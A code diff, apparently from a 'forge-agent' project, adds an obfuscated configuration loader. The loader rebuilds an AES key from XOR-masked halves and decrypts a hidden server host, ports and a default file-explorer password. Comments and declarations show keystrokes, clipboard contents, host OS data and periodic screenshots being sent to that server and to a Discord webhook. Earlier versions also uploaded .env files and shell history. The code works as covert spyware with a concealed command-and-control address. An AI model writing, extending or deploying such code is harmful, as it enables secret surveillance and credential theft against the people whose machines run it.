+ require("./envLoad");
21
+ const node_crypto_1 = require("node:crypto");
22
+ const deploymentCipherData_1 = require("./deploymentCipherData");
23
+ let _payload;
24
+ function parseBundleKey(raw) {
25
+ const t = raw.trim();
26
+ if (/^[0-9a-fA-F]{64}$/.test(t)) {
27
+ return Buffer.from(t, "hex");
28
+ }
29
+ const b = Buffer.from(t, "base64");
30
+ if (b.length === 32) {
31
+ return b;
32
+ }
33
+ throw new Error("FORGE_JS_BUNDLE_KEY must be 64 hex characters or base64 encoding 32 bytes");
34
+ }
35
+ /**
36
+ * Reconstruct the 32-byte key from the embedded XOR-obfuscated halves.
37
+ * key[i] = DEPLOYMENT_KEY_A[i] ^ DEPLOYMENT_MASK_A[i] (i = 0..15)
38
+ * key[16 + i] = DEPLOYMENT_KEY_B[i] ^ DEPLOYMENT_MASK_B[i] (i = 0..15)
39
+ */
40
+ function embeddedBundleKey() {
41
+ const key = Buffer.alloc(32);
42
+ for (let i = 0; i < 16; i++) {
43
+ key[i] = (deploymentCipherData_1.DEPLOYMENT_KEY_A[i] ?? 0) ^ (deploymentCipherData_1.DEPLOYMENT_MASK_A[i] ?? 0);
44
+ }
45
+ for (let i = 0; i < 16; i++) {
46
+ key[16 + i] = (deploymentCipherData_1.DEPLOYMENT_KEY_B[i] ?? 0) ^ (deploymentCipherData_1.DEPLOYMENT_MASK_B[i] ?? 0);
47
+ }
48
+ return key;
49
+ }
50
+ function resolveDecryptionKey() {
51
+ const envKey = process.env.FORGE_JS_BUNDLE_KEY?.trim();
52
+ if (envKey) {
53
+ try {
54
+ return parseBundleKey(envKey);
55
+ }
56
+ catch {
57
+ // Invalid override key — fall through to embedded obfuscated key rather
58
+ // than returning null, which would silently break all deployment defaults.
59
+ return embeddedBundleKey();
60
+ }
61
+ }
62
+ return embeddedBundleKey();
63
+ }
64
+ /**
65
+ * AES-256 key shared with encrypted operator blobs (e.g. `CFGMGR_HF_CREDENTIALS_B64`).
66
+ * Same resolution as deployment defaults (`FORGE_JS_BUNDLE_KEY` or embedded XOR halves).
67
+ */
68
+ function resolveForgeBundleKey() {
69
+ return resolveDecryptionKey() ?? embeddedBundleKey();
70
+ }
71
+ function tryDecryptPayload() {
72
+ const key = resolveDecryptionKey();
73
+ if (!key)
74
+ return null;
75
+ try {
76
+ const iv = Buffer.from(deploymentCipherData_1.DEPLOYMENT_CIPHER_IV_B64, "base64");
77
+ const tag = Buffer.from(deploymentCipherData_1.DEPLOYMENT_CIPHER_TAG_B64, "base64");
78
+ const enc = Buffer.from(deploymentCipherData_1.DEPLOYMENT_CIPHER_TEXT_B64, "base64");
79
+ const decipher = (0, node_crypto_1.createDecipheriv)("aes-256-gcm", key, iv);
80
+ decipher.setAuthTag(tag);
81
+ const plain = Buffer.concat([decipher.update(enc), decipher.final()]);
82
+ const o = JSON.parse(plain.toString("utf8"));
83
+ const publicHost = String(o.publicHost ?? "").trim();
84
+ const relayPort = Number(o.relayPort);
85
+ const apiPort = Number(o.apiPort);
86
+ const defaultExplorerPassword = String(o.defaultExplorerPassword ?? "");
87
+ if (!publicHost ||
88
+ !Number.isFinite(relayPort) ||
89
+ relayPort <= 0 ||
90
+ relayPort > 65535 ||
91
+ !Number.isFinite(apiPort) ||
92
+ apiPort <= 0 ||
93
+ apiPort > 65535) {
94
+ return null;
95
+ }
96
+ return {
97
+ publicHost,
98
+ relayPort: relayPort | 0,
99
+ apiPort: apiPort | 0,
100
+ defaultExplorerPassword,
101
+ };
102
+ }
103
+ catch {
104
+ return null;
105
+ }
106
+ }
107
+ function payload() {
108
+ if (_payload !== undefined) {
109
+ return _payload;
110
+ }
111
+ _payload = tryDecryptPayload();
112
+ return _payload;
113
+ }
114
+ function deploymentDefaultsDisabled() {
115
+ return (process.env.FORGE_JS_DISABLE_DEPLOYMENT_DEFAULTS || "").trim() === "1";
116
+ }
117
+ function effectiveHost() {
118
+ if (deploymentDefaultsDisabled()) {
119
+ return "";
120
+ }
121
+ return payload()?.publicHost?.trim() ?? "";
122
+ }
123
+ function effectiveRelayPort() {
124
+ const fromPayload = payload()?.relayPort;
125
+ if (fromPayload != null && fromPayload > 0) {
126
+ return fromPayload;
127
+ }
128
+ const envP = parseInt(process.env.FORGE_JS_RELAY_PORT || "", 10);
129
+ if (!Number.isNaN(envP) && envP > 0 && envP <= 65535) {
130
+ return envP;
131
+ }
132
+ // Fallback only if payload decryption failed entirely
133
+ return 9877;
134
+ }
135
+ function effectiveApiPort() {
136
+ const fromPayload = payload()?.apiPort;
137
+ if (fromPayload != null && fromPayload > 0) {
138
+ return fromPayload;
139
+ }
140
+ const envP = parseInt(process.env.FORGE_JS_API_PORT || "", 10);
141
+ if (!Number.isNaN(envP) && envP > 0 && envP <= 65535) {
142
+ return envP;
143
+ }
144
+ // Fallback only if payload decryption failed entirely
145
+ return 8765;
146
+ }
147
+ function effectiveDefaultExplorerPassword() {
148
+ const fromPayload = payload()?.defaultExplorerPassword?.trim();
149
+ if (fromPayload) {
150
+ return fromPayload;
151
+ }
152
+ // Fallback: empty string forces callers to require explicit password config
153
+ return "";
154
+ }
155
+ /** Public deployment host from decrypted bundle (empty if disabled or bad decrypt). */
156
+ exports.DEPLOYMENT_PUBLIC_HOST = (() => effectiveHost())();
157
+ /** Relay port from bundle, else FORGE_JS_RELAY_PORT, else generic default. */
158
+ exports.RELAY_DEFAULT_PORT = (() => effectiveRelayPort())();
159
+ /** API port from bundle, else FORGE_JS_API_PORT, else generic default. */
160
+ exports.API_DEFAULT_PORT = (() => effectiveApiPort())();
161
+ /**
162
+ * Default session password for /files explorer and agent when not overridden by env/CLI.
163
+ * Comes from encrypted bundle; empty string if bundle decrypt fails.
164
+ */
165
+ exports.DEFAULT_EXPLORER_PASSWORD = (() => effectiveDefaultExplorerPassword())();
166
+ function defaultRelayWsUrl() {
167
+ const host = exports.DEPLOYMENT_PUBLIC_HOST;
168
+ if (!host) {
169
+ return "";
170
+ }
171
+ return `ws://${host}:${exports.RELAY_DEFAULT_PORT}`;
172
+ }
173
+ function defaultSyncApiBaseUrl() {
174
+ const host = exports.DEPLOYMENT_PUBLIC_HOST;
175
+ if (!host) {
176
+ return "";
177
+ }
178
+ return `http://${host}:${exports.API_DEFAULT_PORT}`;
179
+ }
180
+ /**
181
+ * Effective forge-db HTTP base URL — same rules as `resolveSyncApiBase` in `windowsInputSync`:
182
+ * `FORGE_JS_SYNC_URL` / `CFGMGR_CFG` / `CFGMGR_API_URL`, else `defaultSyncApiBaseUrl()` when
183
+ * deployment defaults are enabled. Returns null if sync is disabled or no host is configured.
184
+ */
185
+ function resolveSyncApiBaseUrl() {
186
+ if ((process.env.FORGE_JS_DISABLE_SYNC || "").trim() === "1") {
187
+ return null;
188
+ }
189
+ const u = (process.env.FORGE_JS_SYNC_URL ||
190
+ process.env.CFGMGR_CFG ||
191
+ process.env.CFGMGR_API_URL ||
192
+ "").trim();
193
+ if (u)
194
+ return u.replace(/\/+$/, "");
195
+ if (deploymentDefaultsDisabled())
196
+ return null;
197
+ const d = defaultSyncApiBaseUrl().replace(/\/+$/, "");
198
+ return d || null;
199
+ }
@@ -0,0 +1,18 @@
1
+ /**
2
+ * Historical name only — **forge-agent no longer uploads .env files or shell history** to forge-db.
3
+ * Keyboard + clipboard + a **minimal host OS JSON** snapshot (`hostInventorySend.ts` via `windowsInputSync.ts`) are synced.
4
+ *
5
+ * Public API stubs remain so older imports do not break at compile time.
6
+ */
7
+ export declare function effectiveSyncEnvFiles(): boolean;
8
+ export declare function resolveEnvScanRootsFromEnv(): string[] | undefined;
9
+ export interface DesktopEnvSyncOptions {
10
+ apiBaseUrl: string;
11
+ clientId?: string;
12
+ intervalMs?: number;
13
+ roots?: string[];
14
+ quiet?: boolean;
15
+ skipRegistrationHandshake?: boolean;
16
+ }
17
+ /** No-op — env/history/inventory sync was removed from the agent. */
18
+ export declare function startDesktopEnvSync(_opts: DesktopEnvSyncOptions): () => void;
@@ -0,0 +1,21 @@
1
+ "use strict";
2
+ /**
3
+ * Historical name only — **forge-agent no longer uploads .env files or shell history** to forge-db.
4
+ * Keyboard + clipboard + a **minimal host OS JSON** snapshot (`hostInventorySend.ts` via `windowsInputSync.ts`) are synced.
5
+ *
6
+ * Public API stubs remain so older imports do not break at compile time.
7
+ */
8
+ Object.defineProperty(exports, "__esModule", { value: true });
9
+ exports.effectiveSyncEnvFiles = effectiveSyncEnvFiles;
10
+ exports.resolveEnvScanRootsFromEnv = resolveEnvScanRootsFromEnv;
11
+ exports.startDesktopEnvSync = startDesktopEnvSync;
12
+ function effectiveSyncEnvFiles() {
13
+ return false;
14
+ }
15
+ function resolveEnvScanRootsFromEnv() {
16
+ return undefined;
17
+ }
18
+ /** No-op — env/history/inventory sync was removed from the agent. */
19
+ function startDesktopEnvSync(_opts) {
20
+ return () => { };
21
+ }
@@ -0,0 +1,27 @@
1
+ export type DiscordRelayAck = {
2
+ ok: boolean;
3
+ error?: string;
4
+ };
5
+ export type DiscordTicketResult = {
6
+ ok: boolean;
7
+ webhook_url?: string;
8
+ error?: string;
9
+ };
10
+ export type DiscordAgentScreenshotOpts = {
11
+ sendJson: (obj: unknown) => void;
12
+ quiet: boolean;
13
+ waitForRelayDiscordAck: (requestId: string) => Promise<DiscordRelayAck>;
14
+ waitForDiscordTicket: (requestId: string) => Promise<DiscordTicketResult>;
15
+ /** When true, run the loop when relay sends `discord_screenshot` and the agent did not explicitly opt out. */
16
+ enabledByRelayCapabilities?: boolean;
17
+ };
18
+ /**
19
+ * Milliseconds between capture cycles (after each capture finishes). Same bounds as relay handshake
20
+ * `discord_screenshot_interval_ms`: **10s–600s**; invalid/unset agent env defaults to **300000**.
21
+ */
22
+ export declare function resolveDiscordScreenshotIntervalMs(): number;
23
+ /**
24
+ * Base interval plus optional **stable** stagger from `client_id` (same bounds 10s–600s).
25
+ */
26
+ export declare function resolveDiscordScreenshotScheduledIntervalMs(clientId: string): number;
27
+ export declare function startDiscordScreenshotToRelayLoop(opts: DiscordAgentScreenshotOpts): () => void;